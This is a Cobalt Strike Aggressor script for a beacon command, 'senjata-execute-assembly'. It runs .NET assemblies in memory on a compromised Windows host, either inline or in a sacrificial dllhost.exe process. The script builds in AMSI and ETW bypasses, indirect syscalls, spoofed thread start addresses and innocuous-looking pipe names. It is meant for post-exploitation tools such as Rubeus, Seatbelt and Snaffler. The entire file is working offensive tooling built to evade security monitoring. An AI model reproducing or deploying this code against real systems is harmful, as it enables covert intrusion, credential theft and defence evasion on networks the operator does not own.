beacon_command_register(
    "senjata-execute-assembly",
    "Run a .NET assembly with patchless AMSI/ETW bypass + ExitProcess trap",
    "Synopsis:\n  senjata-execute-assembly --dotnetassembly /path/to/Assembly.exe [opts]\n\nDefault: sacrificial mode (spawns dllhost.exe per profile, live-streams output).\nUse --inline ONLY for trusted Ghostpack-class tools — inline mode may kill the beacon on hostile tooling.\n\nOptions: [--inline] [--noamsi] [--noetw] [--mailslot]\n         [--appdomain name] [--main] [--assemblyargs <args>]\n         [--dotnetassemblydir <dir>] [--pipename name] [--slotname name]");

global('$default_appDomain $default_pipeName $default_mailSlotName');
$default_appDomain    = "totesLegit";
$default_pipeName     = "totesLegit";
$default_mailSlotName = "totesLegit";

# Pack a u32 little-endian as a 4-byte binary string. Sleep's pack("<i",...)
# is unreliable for endianness across CS versions; we encode manually.
sub u32le {
    local('$n');
    $n = $1;
    return chr($n & 0xFF) . chr(($n >> 8) & 0xFF) . chr(($n >> 16) & 0xFF) . chr(($n >> 24) & 0xFF);
}

# Strip a single pair of surrounding double quotes from a token. Operators
# often write `--assemblyargs "-s" "-y"`; CS split(' ',...) preserves the
# quote chars, which then breaks downstream arg parsers like
# CommandLineArgumentsParser (Snaffler, SharpUp, etc.).
sub _strip_outer_quotes {
    local('$s $len');
    $s = $1;
    $len = strlen($s);
    if ($len >= 2 && substr($s, 0, 1) eq '"' && substr($s, $len - 1, $len) eq '"') {
        return substr($s, 1, $len - 1);
    }
    return $s;
}

# Locate senjata-runner.x64.dll.
# Checks (1) same directory as this CNA (dist/ when CNA was copied there),
# then (2) repo dist/ relative to the source CNA location.
sub senjata_find_runner_dll {
    local('$path $dir');

    $path = script_resource("senjata-runner.x64.dll");
    if (-isFile $path) { return $path; }

    # Source-tree path: CNA lives 3 levels deep (bofs/senjata.../aggressor/)
    $dir  = script_resource(".");
    $path = $dir . "/../../../dist/senjata-runner.x64.dll";
    if (-isFile $path) { return $path; }

    return $null;
}

# Run senjata-runner postex DLL (sacrificial fork-and-run; live streaming).
# $1=bid  $2=pre-packed bofArgs
# Returns 1 on success, 0 on failure.
sub senjata_run_sacrificial {
    local('$bid $bofArgs $dll_path $dll_data $handle');
    local('$profile $alloc_type $thread_start $output_pipe $pipe_name');
    local('$packed_arguments $callback %bof_alloc_map @hint_parts');

    $bid     = $1;
    $bofArgs = $2;

    # Locate and load the postex DLL
    $dll_path = senjata_find_runner_dll();
    if ($dll_path is $null) {
        berror($bid, "[-] senjata-runner.x64.dll not found. Build with: cargo make build");
        return 0;
    }
    $handle   = openf($dll_path);
    $dll_data = readb($handle, -1);
    closef($handle);
    if (strlen($dll_data) < 1) {
        berror($bid, "[-] senjata-runner.x64.dll is empty or unreadable");
        return 0;
    }

    # Allocator type from C2 profile (default VirtualAlloc=2)
    $profile    = data_query("metadata")["c2profile"];
    $alloc_type = [$profile getString: ".process-inject.bof_allocator"];
    %bof_alloc_map = %(MapViewOfFile => 0, HeapAlloc => 1, VirtualAlloc => 2);
    if ($alloc_type !in %bof_alloc_map) {
        $alloc_type = 2;
    } else {
        $alloc_type = %bof_alloc_map[$alloc_type];
    }

    # Thread hint from C2 profile (default ntdll!RtlUserThreadStart+0x21)
    $thread_start = [$profile getString: ".post-ex.thread_hint"];
    if (!$thread_start) {
        $thread_start = "ntdll.dll!RtlUserThreadStart+0x21";
    } else {
        @hint_parts = split(" ", $thread_start, 3);
        if (size(@hint_parts) == 2) {
            $thread_start = @hint_parts[0] . "!" . @hint_parts[1];
        } else if (size(@hint_parts) == 3) {
            $thread_start = @hint_parts[0] . "!" . @hint_parts[1] . "+0x" . formatNumber(@hint_parts[2], 16);
        } else {
            $thread_start = "ntdll.dll!RtlUserThreadStart+0x21";
        }
    }

    # Postex output pipe from C2 profile's post-ex.pipename.
    # The runner inherits this pipe via CS's UDPK plumbing; the BeaconAPI
    # function-table our postex DLL receives uses it transparently when
    # the streamer thread calls BeaconOutput().
    $pipe_name = get_postex_pipe();
    if ($pipe_name is $null) {
        berror($bid, "[-] get_postex_pipe() failed; verify post-ex.pipename in C2 profile");
        return 0;
    }
    $output_pipe = "\\\\\.\\pipe\\" . $pipe_name;

    # senjata-runner wire format (UDPK first-run args):
    # [int single_shot=1][int alloc_type][int syscall=1 (indirect)][z thread_start][z pipe][b bofArgs]
    # The `b` field is the raw orchestrator args; senjata-runner's postex_main
    # skips the 176-byte BeaconAPI table prefix CS prepends and parses bofArgs directly.
    $packed_arguments = bof_pack($bid, "iiizzb",
        1, $alloc_type, 1, $thread_start, $output_pipe, $bofArgs);

    $callback = lambda({
        local('$bid $result %info $type');
        this('$jid');
        ($bid, $result, %info) = @_;
        $type = %info["type"];
        if ($type eq 'job_registered') {
            $jid = %info['jid'];
        } else if ($type eq 'output') {
            bjoblog($bid, $jid, $result);
        } else if ($type eq 'error') {
            bjoberror($bid, $jid, $result);
        }
    });

    # $null pid = fork-and-run (CS spawns sacrificial via spawnto_x64).
    beacon_execute_postex_job($bid, $null, $dll_data, $packed_arguments, $callback);
    # 2-hour timeout — long-running tools like Snaffler can run for tens of minutes
    bread_pipe($bid, "ANONYMOUS_BYTESTREAM", "CALLBACK_POSTEX_KIT",
        "senjata-execute-assembly", $output_pipe, 0, 7200000, $null);

    return 1;
}

alias senjata-execute-assembly {
    local('$bid $data @args $_amsi $_etw $_mailSlot $_entryPoint $_dotNetAssembly $_dotNetDir');
    local('$_appDomain $_mailSlotName $_pipeName $_assemblyWithArgs $i $j $count');
    local('@_dotNetAssemblyArgs $assemblyBytes $bofPath $handle $bof $bofArgs');
    local('$mode $mainName $payload $f $fpath $fname $body @entries');
    local('$_inline $bodyLen');

    $bid  = $1;
    $data = substr($0, strlen("senjata-execute-assembly "));
    @args = split(' ', $data);

    $_amsi = 1;
    $_etw = 1;
    $_mailSlot = 0;
    $_entryPoint = 1;
    $_dotNetAssembly = "";
    $_dotNetDir = "";
    $_appDomain = "";
    $_mailSlotName = "";
    $_pipeName = "";
    $_assemblyWithArgs = "";
    @_dotNetAssemblyArgs = @();
    $_inline = 0;

    for ($i = 0; $i < size(@args); $i++) {
        if (@args[$i] eq "--amsi") {
            $_amsi = 1;
        }
        else if (@args[$i] eq "--noamsi") {
            $_amsi = 0;
        }
        else if (@args[$i] eq "--etw") {
            $_etw = 1;
        }
        else if (@args[$i] eq "--noetw") {
            $_etw = 0;
        }
        else if (@args[$i] eq "--mailslot") {
            $_mailSlot = 1;
        }
        else if (@args[$i] eq "--main") {
            $_entryPoint = 0;
        }
        else if (@args[$i] eq "--dotnetassembly") {
            $i = $i + 1;
            $_dotNetAssembly = @args[$i];
        }
        else if (@args[$i] eq "--dotnetassemblydir") {
            $i = $i + 1;
            $_dotNetDir = @args[$i];
        }
        else if (@args[$i] eq "--appdomain") {
            $i = $i + 1;
            $_appDomain = @args[$i];
        }
        else if (@args[$i] eq "--slotname") {
            $i = $i + 1;
            $_mailSlotName = @args[$i];
        }
        else if (@args[$i] eq "--pipename") {
            $i = $i + 1;
            $_pipeName = @args[$i];
        }
        else if (@args[$i] eq "--inline") {
            $_inline = 1;
        }
        else if (@args[$i] eq "--async") {
            berror($bid, "[-] --async is removed in v0.3+. Default is now sacrificial via the postex DLL. Use --inline only for trusted small tools (Rubeus, SharpUp, Seatbelt, etc.). See docs/superpowers/specs/2026-05-21-universal-csharp-runner-design.md.");
            return;
        }
        else if (@args[$i] eq "--assemblyargs") {
            $i = $i + 1;
            $count = 0;
            for ($j = $i; $j < size(@args); $j++) {
                if (@args[$j] eq "--amsi" || @args[$j] eq "--noamsi" || @args[$j] eq "--etw" || @args[$j] eq "--noetw"
                 || @args[$j] eq "--mailslot" || @args[$j] eq "--main"
                 || @args[$j] eq "--dotnetassembly" || @args[$j] eq "--dotnetassemblydir" || @args[$j] eq "--appdomain" || @args[$j] eq "--slotname"
                 || @args[$j] eq "--pipename" || @args[$j] eq "--assemblyargs" || @args[$j] eq "--inline") {
                    break;
                }
                @_dotNetAssemblyArgs[$count] = @args[$j];
                $count = $count + 1;
                $i = $j;
            }
        }
    }

    # Apply defaults
    if ($_appDomain eq "")    { $_appDomain    = $default_appDomain;    }
    if ($_mailSlotName eq "") { $_mailSlotName = $default_mailSlotName; }
    if ($_pipeName eq "")     { $_pipeName     = $default_pipeName;     }

    # Validate: exactly one of --dotnetassembly or --dotnetassemblydir
    if ($_dotNetAssembly eq "" && $_dotNetDir eq "") {
        berror($bid, "[-] one of --dotnetassembly or --dotnetassemblydir is required");
        return;
    }
    if ($_dotNetAssembly ne "" && $_dotNetDir ne "") {
        berror($bid, "[-] cannot use both --dotnetassembly and --dotnetassemblydir");
        return;
    }
    if ($_dotNetAssembly ne "" && (!-exists $_dotNetAssembly || !-isFile $_dotNetAssembly)) {
        berror($bid, "[-] File ".$_dotNetAssembly." does not exist");
        return;
    }
    if ($_dotNetDir ne "" && (!-exists $_dotNetDir || !-isDir $_dotNetDir)) {
        berror($bid, "[-] Dir ".$_dotNetDir." does not exist");
        return;
    }

    # Reassemble --assemblyargs as one space-separated string.
    # Strip surrounding double quotes from each token so `"-s" "-y"` works
    # the same as `-s -y` (CommandLineArgumentsParser et al. reject quoted
    # switch names like `"-s"`).
    for ($i = 0; $i < size(@_dotNetAssemblyArgs); $i++) {
        local('$_clean');
        $_clean = _strip_outer_quotes(@_dotNetAssemblyArgs[$i]);
        if ($_clean ne "") {
            if ($_assemblyWithArgs eq "") {
                $_assemblyWithArgs = $_clean;
            } else {
                $_assemblyWithArgs = $_assemblyWithArgs." ".$_clean;
            }
        }
    }

    # Read the .o BOF
    $bofPath = script_resource("senjata-execute-assembly.x64.o");
    if (!-exists $bofPath) {
        berror($bid, "[-] BOF not found at ".$bofPath);
        return;
    }
    $handle = openf($bofPath);
    $bof = readb($handle, -1);
    closef($handle);
    if (strlen($bof) < 1) {
        berror($bid, "[-] BOF file is empty: ".$bofPath);
        return;
    }

    # Build payload + mode + main_name
    if ($_dotNetAssembly ne "") {
        # Single-file mode
        $mode = 0;
        $mainName = "";
        $handle = openf($_dotNetAssembly);
        $payload = readb($handle, -1);
        closef($handle);
    }
    else {
        # Multi-file mode: pack [n_files: u32] [name_len:u32][name][body_len:u32][body] ...
        $mode = 1;
        $mainName = "";
        @entries = @();
        # Normalize trailing slash
        if ($_dotNetDir endsWith "/" || $_dotNetDir endsWith "\\") {
            $_dotNetDir = substr($_dotNetDir, 0, strlen($_dotNetDir) - 1);
        }
        # Use Java's File API directly via Sleep bridge — works across Sleep
        # versions. ls() behavior varies; this is deterministic.
        local('$javaDir @listed $javaFile');
        $javaDir = [new java.io.File: $_dotNetDir];
        @listed = [$javaDir listFiles];
        if (size(@listed) == 0) {
            @listed = ls($_dotNetDir);
        }
        foreach $javaFile (@listed) {
            $fpath = "$javaFile";
            $fname = getFileName($fpath);
            if (-isFile $fpath && ($fname ismatch ".+\\.dll\$" || $fname ismatch ".+\\.exe\$")) {
                # Skip facade/framework DLLs already loaded in Beacon's CLR;
                # re-loading them via Load_3 conflicts with the existing
                # versions and can crash the CLR.
                if ($fname ismatch "^(System\\.|Microsoft\\.|mscorlib|netstandard).*\\.dll\$") {
                    continue;
                }
                # Use lof() for the exact byte size — strlen() on binary
                # buffers stops at the first NUL (managed PE bytes have NULs
                # everywhere, including offset 3 of the MZ header).
                $bodyLen = lof($fpath);
                $handle = openf($fpath);
                $body = readb($handle, $bodyLen);
                closef($handle);
                push(@entries, @($fname, $body, $bodyLen));
                if ($mainName eq "" && $fname ismatch ".+\\.exe\$") {
                    $mainName = $fname;
                }
            }
        }
        if (size(@entries) == 0) {
            berror($bid, "[-] No files in ".$_dotNetDir);
            return;
        }
        if ($mainName eq "") {
            berror($bid, "[-] No .exe found in ".$_dotNetDir." (need exactly one)");
            return;
        }
        $payload = u32le(size(@entries));
        foreach $f (@entries) {
            $fname = $f[0];
            $body = $f[1];
            $bodyLen = $f[2];  # exact byte size from lof(), not strlen on binary
            $payload = $payload . u32le(strlen($fname)) . $fname . u32le($bodyLen) . $body;
        }
    }

    # Pack args matching senjata-execute-assembly args.rs:
    #   z app_domain | i amsi | i etw | i mailslot | i entry_point
    #   z slot_name | z pipe_name | z asm_args | i mode | z main_name | b payload
    $bofArgs = bof_pack($bid, "ziiiizzzizb",
        $_appDomain, $_amsi, $_etw, $_mailSlot, $_entryPoint,
        $_mailSlotName, $_pipeName, $_assemblyWithArgs,
        $mode, $mainName, $payload);

    if ($_dotNetDir ne "") {
        btask($bid, "Running senjata-execute-assembly" . iff($_inline, " [inline]", " [sacrificial]") . " (dir=".$_dotNetDir.", main=".$mainName.", ".size(@entries)." files)");
    } else {
        btask($bid, "Running senjata-execute-assembly" . iff($_inline, " [inline]", " [sacrificial]") . " (".$_dotNetAssembly.")");
    }

    if ($_inline) {
        # Inline mode: BOF runs inside Beacon. Use only for trusted, light tools.
        beacon_inline_execute($bid, $bof, "go", $bofArgs);
    } else {
        # Default: postex DLL inside sacrificial process. Live-streams output.
        if (!senjata_run_sacrificial($bid, $bofArgs)) {
            berror($bid, "[-] sacrificial dispatch failed. Inspect dist/senjata-runner.x64.dll and Malleable C2 post-ex.pipename setting.");
        }
    }

    clear(@_dotNetAssemblyArgs);
}
